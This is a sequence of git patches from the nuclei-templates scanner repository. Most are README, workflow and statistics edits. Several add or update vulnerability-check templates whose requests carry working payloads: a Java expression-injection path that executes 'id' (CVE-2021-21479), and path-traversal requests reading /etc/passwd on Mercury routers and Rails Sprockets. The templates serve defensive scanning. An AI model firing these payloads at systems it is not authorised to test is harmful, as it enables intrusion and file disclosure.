Date: Tue, 20 Jul 2021 08:14:37 +0200
Subject: [PATCH 118/149] chore: rephrase readme
Fixes some grammar mistakes
---
README.md | 11 ++++++-----
1 file changed, 6 insertions(+), 5 deletions(-)
diff --git a/README.md b/README.md
index bfb7b06b0d..95561517c1 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
Nuclei Templates
-Community curated list of templates for the nuclei engine to find a security vulnerability in application.
+Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.
@@ -24,7 +24,7 @@ Nuclei Templates
----
-Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
+Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. This repository stores various templates for the scanner provided by our team, as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
@@ -57,7 +57,8 @@ An overview of the nuclei template directory including number of templates assoc
📖 Documentation
-----
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
+Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
+Ee have also added a set of example templates to help you understand how things work.
💪 Contributions
-----
@@ -67,7 +68,7 @@ Nuclei-templates is powered by major contributions from the community. [Template
💬 Discussion
-----
-Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
+Have questions / doubts / ideas to discuss? Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨💻 Community
-----
@@ -79,4 +80,4 @@ You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). Yo
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
-Thanks again for your contribution and keeping the community vibrant. :heart:
+Thanks again for your contribution and keeping this community vibrant. :heart:
From 0ae92650b9310bb7c0a01619102b749584231733 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 20 Jul 2021 11:45:05 +0530
Subject: [PATCH 119/149] minor improvements
---
.github/workflows/templates-stats.yml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml
index 9457a24b98..ff20e740ed 100644
--- a/.github/workflows/templates-stats.yml
+++ b/.github/workflows/templates-stats.yml
@@ -26,6 +26,7 @@ jobs:
key: ${{ runner.os }}-go
- name: Installing Template Stats
+ if: steps.cache-go.outputs.cache-hit != 'true'
env:
GO111MODULE: on
run: |
@@ -44,6 +45,7 @@ jobs:
- name: Commit files
run: |
+ git pull --tags -f
git add TEMPLATES-STATS.md
git add TEMPLATES-STATS.json
git config --local user.email "action@github.com"
From 0dacd565679c3510444dd83bd90daeed0289a2f9 Mon Sep 17 00:00:00 2001
From: Niels Hofmans
Date: Tue, 20 Jul 2021 08:35:06 +0200
Subject: [PATCH 120/149] chore: rephrase
---
.github/scripts/README.tmpl | 22 ++++++++++++++--------
1 file changed, 14 insertions(+), 8 deletions(-)
diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl
index 0bb7102614..29e8d08bf1 100644
--- a/.github/scripts/README.tmpl
+++ b/.github/scripts/README.tmpl
@@ -3,7 +3,7 @@ f"""
Nuclei Templates
-Community curated list of templates for the nuclei engine to find a security vulnerability in application.
+Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.
@@ -24,7 +24,9 @@ Nuclei Templates
----
-Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
+Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
+This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
+We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
@@ -57,27 +59,31 @@ An overview of the nuclei template directory including number of templates assoc
📖 Documentation
-----
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
+Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
+We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
-Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
+Nuclei-templates is powered by major contributions from the community.
+[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
💬 Discussion
-----
-Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
+Have questions / doubts / ideas to discuss?
+Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨💻 Community
-----
-You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
+You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
+You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
-Thanks again for your contribution and keeping the community vibrant. :heart:
-"""
\ No newline at end of file
+Thanks again for your contribution and keeping this community vibrant. :heart:
+"""
From 21809132da8d9bba2b44577ded4598d83aea7f73 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Tue, 20 Jul 2021 13:36:04 +0700
Subject: [PATCH 121/149] Renamed to CVE-2021-24340.yaml
---
.../2021/CVE-2021-24340.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
rename vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml => cves/2021/CVE-2021-24340.yaml (92%)
diff --git a/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml b/cves/2021/CVE-2021-24340.yaml
similarity index 92%
rename from vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml
rename to cves/2021/CVE-2021-24340.yaml
index da683968f2..0f6578244b 100644
--- a/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml
+++ b/cves/2021/CVE-2021-24340.yaml
@@ -1,4 +1,4 @@
-id: wp-plugin-statistics-sqli
+id: CVE-2021-24340
info:
name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
@@ -9,7 +9,7 @@ info:
- https://www.exploit-db.com/exploits/49894
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://github.com/Udyz/WP-Statistics-BlindSQL
- tags: wordpress,wp-plugin,unauth,sqli,blind
+ tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind
requests:
- method: GET
From c5088ab9bcad51dda15d904c358e12d882dd6ea9 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 20 Jul 2021 12:12:18 +0530
Subject: [PATCH 122/149] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 95561517c1..740381b4d9 100644
--- a/README.md
+++ b/README.md
@@ -58,7 +58,7 @@ An overview of the nuclei template directory including number of templates assoc
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
-Ee have also added a set of example templates to help you understand how things work.
+We have also added a set of example templates to help you understand how things work.
💪 Contributions
-----
From 4e505722b224a2c86025f99d130edef67ea2fc47 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jul 2021 14:49:04 +0700
Subject: [PATCH 123/149] Initialize Top 10 stats
---
TOP-10.md | 12 ++++++++++++
1 file changed, 12 insertions(+)
create mode 100644 TOP-10.md
diff --git a/TOP-10.md b/TOP-10.md
new file mode 100644
index 0000000000..8f5b14bdca
--- /dev/null
+++ b/TOP-10.md
@@ -0,0 +1,12 @@
+| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
+|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
+| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 |
+| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 |
+| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 |
+| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 |
+| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | |
+| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | |
+| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | |
+| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | |
+| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | |
+| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | |
From 2d95c8dbfc62128edf16ca2c3b4d19d37fbdd620 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jul 2021 14:49:43 +0700
Subject: [PATCH 124/149] Update README template to call get top 10
---
.github/scripts/README.tmpl | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl
index 29e8d08bf1..6c65868500 100644
--- a/.github/scripts/README.tmpl
+++ b/.github/scripts/README.tmpl
@@ -53,7 +53,7 @@ An overview of the nuclei template directory including number of templates assoc
-
+{get_top10()}
📖 Documentation
From 31bae65ed1a001b83418fe2d3da3daf531e39ea4 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jul 2021 14:50:15 +0700
Subject: [PATCH 125/149] Add getting top 10 function
---
.github/scripts/update-readme.py | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/.github/scripts/update-readme.py b/.github/scripts/update-readme.py
index 23100c718e..f3bb1efde9 100644
--- a/.github/scripts/update-readme.py
+++ b/.github/scripts/update-readme.py
@@ -8,6 +8,10 @@ def countTpl(path):
def command(args, start=None, end=None):
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
+def get_top10():
+ TOP10 = command(["cat", "TOP-10.md"])
+ return "## Top 10 Contributors\n\n" + TOP10 if len(TOP10) > 0 else ""
+
if __name__ == "__main__":
version = command(["git", "describe", "--tags", "--abbrev=0"])
template = eval(open(".github/scripts/README.tmpl", "r").read())
From 38886322c3efb7d2774c92b2af70b506c4676c8e Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jul 2021 14:50:37 +0700
Subject: [PATCH 126/149] Update template stats workflow
---
.github/workflows/templates-stats.yml | 28 ++++++++++++++++++---------
1 file changed, 19 insertions(+), 9 deletions(-)
diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml
index ff20e740ed..e647edb2f5 100644
--- a/.github/workflows/templates-stats.yml
+++ b/.github/workflows/templates-stats.yml
@@ -1,9 +1,8 @@
name: 🗒 Templates Stats
on:
- create:
- tags:
- - v*
+ schedule:
+ - cron: "0 0 * * *"
workflow_dispatch:
jobs:
@@ -12,6 +11,8 @@ jobs:
steps:
- name: Checkout Repo
uses: actions/checkout@master
+ with:
+ fetch-depth: 0
- name: Setup golang
uses: actions/setup-go@v2
@@ -35,19 +36,28 @@ jobs:
- name: Markdown Stats
run: |
- templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/
+ templates-stats -output TEMPLATES-STATS.md -path {{ github.workspace }}
shell: bash
- name: JSON Stats
run: |
- templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/
+ templates-stats -output TEMPLATES-STATS.json -json -path {{ github.workspace }}
shell: bash
- - name: Commit files
+ - name: Top 10 Stats
run: |
- git pull --tags -f
- git add TEMPLATES-STATS.md
- git add TEMPLATES-STATS.json
+ templates-stats -output TOP-10.md -top 10 -path {{ github.workspace }}
+ shell: bash
+
+ - name: Get statistical changes
+ id: stats
+ run: echo "::set-output name=changes::$(git status -s | wc -l)"
+
+ - name: Commit files
+ if: steps.stats.outputs.changes > 0
+ run: |
+ git add TEMPLATES-STATS.*
+ git add TOP-10.md
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
From 3dfccad5f187ee09c4e3da2080436306db04fb3a Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jul 2021 14:55:28 +0700
Subject: [PATCH 127/149] Add workflow dispatch trigger
---
.github/workflows/update-readme.yml | 1 +
1 file changed, 1 insertion(+)
diff --git a/.github/workflows/update-readme.yml b/.github/workflows/update-readme.yml
index f837ccfd4d..0f59dd9677 100644
--- a/.github/workflows/update-readme.yml
+++ b/.github/workflows/update-readme.yml
@@ -4,6 +4,7 @@ on:
create:
tags:
- v*
+ workflow_dispatch:
jobs:
build:
From 6d315e62b55daf6533a669376039e82a309821ed Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jul 2021 14:57:07 +0700
Subject: [PATCH 128/149] Using variable for heading instead
---
.github/scripts/update-readme.py | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/.github/scripts/update-readme.py b/.github/scripts/update-readme.py
index f3bb1efde9..814459587f 100644
--- a/.github/scripts/update-readme.py
+++ b/.github/scripts/update-readme.py
@@ -9,8 +9,9 @@ def command(args, start=None, end=None):
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
def get_top10():
+ HEADER = "## Top 10 Contributors\n\n"
TOP10 = command(["cat", "TOP-10.md"])
- return "## Top 10 Contributors\n\n" + TOP10 if len(TOP10) > 0 else ""
+ return HEADER + TOP10 if len(TOP10) > 0 else ""
if __name__ == "__main__":
version = command(["git", "describe", "--tags", "--abbrev=0"])
From aec5340126d0b148addcf911cd7308617f34d03d Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 20 Jul 2021 15:22:20 +0700
Subject: [PATCH 129/149] Revert scheduled trigger
---
.github/workflows/templates-stats.yml | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml
index e647edb2f5..a701cd34d1 100644
--- a/.github/workflows/templates-stats.yml
+++ b/.github/workflows/templates-stats.yml
@@ -1,8 +1,9 @@
name: 🗒 Templates Stats
on:
- schedule:
- - cron: "0 0 * * *"
+ create:
+ tags:
+ - v*
workflow_dispatch:
jobs:
From 0af69ac0fdf8364ef66b2c8047c41571ce0f2c22 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 14:15:45 +0530
Subject: [PATCH 130/149] Update CVE-2021-21479.yaml
---
cves/2021/CVE-2021-21479.yaml | 3 ---
1 file changed, 3 deletions(-)
diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml
index e6fc7a8ee6..3fa32c53bd 100644
--- a/cves/2021/CVE-2021-21479.yaml
+++ b/cves/2021/CVE-2021-21479.yaml
@@ -24,6 +24,3 @@ requests:
- "has invalid value!"
part: body
condition: and
- - type: status
- status:
- - 400
From b10b8a61b845ac81e591fa0ca991341c09a2eb53 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 14:16:30 +0530
Subject: [PATCH 131/149] Update CVE-2021-21479.yaml
---
cves/2021/CVE-2021-21479.yaml | 1 -
1 file changed, 1 deletion(-)
diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml
index 3fa32c53bd..490f5cbf73 100644
--- a/cves/2021/CVE-2021-21479.yaml
+++ b/cves/2021/CVE-2021-21479.yaml
@@ -15,7 +15,6 @@ requests:
path:
- "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
- matchers-condition: and
matchers:
- type: word
words:
From d738d2c9a30cb3926be2441fab60599f22e08a91 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 14:18:21 +0530
Subject: [PATCH 132/149] Update CVE-2021-21479.yaml
---
cves/2021/CVE-2021-21479.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml
index 490f5cbf73..5aded3fcc7 100644
--- a/cves/2021/CVE-2021-21479.yaml
+++ b/cves/2021/CVE-2021-21479.yaml
@@ -21,5 +21,6 @@ requests:
- "The attribute value"
- "java.lang.UNIXProcess@"
- "has invalid value!"
+ - '"status" : "400"'
part: body
condition: and
From c63bb91bdbfa4888c549daf4193f89c9129d434f Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Tue, 20 Jul 2021 15:52:10 +0700
Subject: [PATCH 133/149] Create CVE-2021-23241.yaml
---
cves/2021/CVE-2021-23241.yaml | 23 +++++++++++++++++++++++
1 file changed, 23 insertions(+)
create mode 100644 cves/2021/CVE-2021-23241.yaml
diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml
new file mode 100644
index 0000000000..e5356a9692
--- /dev/null
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -0,0 +1,23 @@
+id: CVE-2021-23241
+
+info:
+ name: Mercury Router Web Server Directory Traversal
+ author: daffainfo
+ severity: medium
+ reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
+ tags: cve,cve2021,iot,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/loginLess/../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[0*]:0:0"
+ part: body
+ - type: status
+ status:
+ - 200
From 1fc173982d241e8957a13fab6aa45cf504f62439 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 14:22:31 +0530
Subject: [PATCH 134/149] Update CVE-2021-21479.yaml
---
cves/2021/CVE-2021-21479.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml
index 5aded3fcc7..5d60f46f48 100644
--- a/cves/2021/CVE-2021-21479.yaml
+++ b/cves/2021/CVE-2021-21479.yaml
@@ -8,7 +8,7 @@ info:
description: |
In SCIMono before 0.0.19, it is possible for an attacker to inject and
execute java expression compromising the availability and integrity of the system.
- tags: cve,cve2021,scim,rce
+ tags: cve,cve2021,scimono,rce
requests:
- method: GET
From 86a7fad73a1ee7f3d92cd214124b6323b1ae22ac Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 14:23:39 +0530
Subject: [PATCH 135/149] Update CVE-2021-23241.yaml
---
cves/2021/CVE-2021-23241.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml
index e5356a9692..fe90d59dcc 100644
--- a/cves/2021/CVE-2021-23241.yaml
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -5,7 +5,7 @@ info:
author: daffainfo
severity: medium
reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- tags: cve,cve2021,iot,lfi
+ tags: cve,cve2021,iot,lfi,router
requests:
- method: GET
From 41c9c3e3f9fe69bc7de6da96a628827b57298df4 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 20 Jul 2021 14:25:37 +0530
Subject: [PATCH 136/149] Update CVE-2021-23241.yaml
---
cves/2021/CVE-2021-23241.yaml | 6 +++++-
1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml
index fe90d59dcc..e65d7120b2 100644
--- a/cves/2021/CVE-2021-23241.yaml
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -4,7 +4,11 @@ info:
name: Mercury Router Web Server Directory Traversal
author: daffainfo
severity: medium
- reference: https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
+ description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
+ reference: |
+ - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-23241
+reference:
tags: cve,cve2021,iot,lfi,router
requests:
From 89f06194198016aa4a4041be72b3ce4f983ce858 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 20 Jul 2021 09:15:09 +0000
Subject: [PATCH 137/149] Auto Update README [Tue Jul 20 09:15:09 UTC 2021]
:robot:
---
README.md | 32 +++++++++++++++++++++++++-------
1 file changed, 25 insertions(+), 7 deletions(-)
diff --git a/README.md b/README.md
index 740381b4d9..6d946b7ac1 100644
--- a/README.md
+++ b/README.md
@@ -24,7 +24,9 @@ Nuclei Templates
----
-Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. This repository stores various templates for the scanner provided by our team, as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
+Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
+This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
+We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
@@ -38,42 +40,58 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 468 | vulnerabilities | 234 | exposed-panels | 202 |
+| cves | 475 | vulnerabilities | 229 | exposed-panels | 202 |
| takeovers | 70 | exposures | 116 | technologies | 125 |
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
| default-logins | 44 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 18 |
-**134 directories, 1604 files**.
+**134 directories, 1609 files**.
+## Top 10 Contributors
+| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
+|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
+| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 |
+| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 |
+| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 |
+| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 |
+| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | |
+| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | |
+| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | |
+| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | |
+| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | |
+| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | |
📖 Documentation
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
-We have also added a set of example templates to help you understand how things work.
+We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
-Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
+Nuclei-templates is powered by major contributions from the community.
+[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
💬 Discussion
-----
-Have questions / doubts / ideas to discuss? Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
+Have questions / doubts / ideas to discuss?
+Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨💻 Community
-----
-You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
+You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
+You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
From 2b156573bd42be06eae71ed23d71e61d030cb747 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Tue, 20 Jul 2021 16:22:18 +0700
Subject: [PATCH 138/149] Update CVE-2018-3760.yaml
---
cves/2018/CVE-2018-3760.yaml | 43 +++++++++++++++++++++++++++---------
1 file changed, 33 insertions(+), 10 deletions(-)
diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml
index 779c5ee4ec..26e04286ed 100644
--- a/cves/2018/CVE-2018-3760.yaml
+++ b/cves/2018/CVE-2018-3760.yaml
@@ -1,22 +1,45 @@
id: CVE-2018-3760
info:
- name: Rails CVE-2018-3760
- author: 0xrudra
+ name: Ruby On Rails Path Traversal
+ author: 0xrudra,pikpikcu
severity: high
+ reference: |
+ - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760
+ - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
+ - https://seclists.org/oss-sec/2018/q2/210
+ - https://xz.aliyun.com/t/2542
+ description: |
+ Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files.
+ There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
tags: cve,cve2018,rails,lfi
requests:
- - method: GET
- path:
- - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
+ - raw:
+ - |
+ GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Content-Length: 94
+
+ - |
+ GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+
+ extractors:
+ - type: regex
+ name: path
+ internal: true
+ part: body
+ regex:
+ - "/etc/passwd is no longer under a load path: (.*?),"
- matchers-condition: and
matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
- type: status
status:
- 200
- - type: regex
- regex:
- - "root:[x*]:0:0:"
- part: body
From e9f9325fd0f7c60475dfd044e9e6198f0160a5de Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Tue, 20 Jul 2021 16:32:27 +0700
Subject: [PATCH 139/149] Create CVE-2012-1823.yaml
---
cves/2012/CVE-2012-1823.yaml | 35 +++++++++++++++++++++++++++++++++++
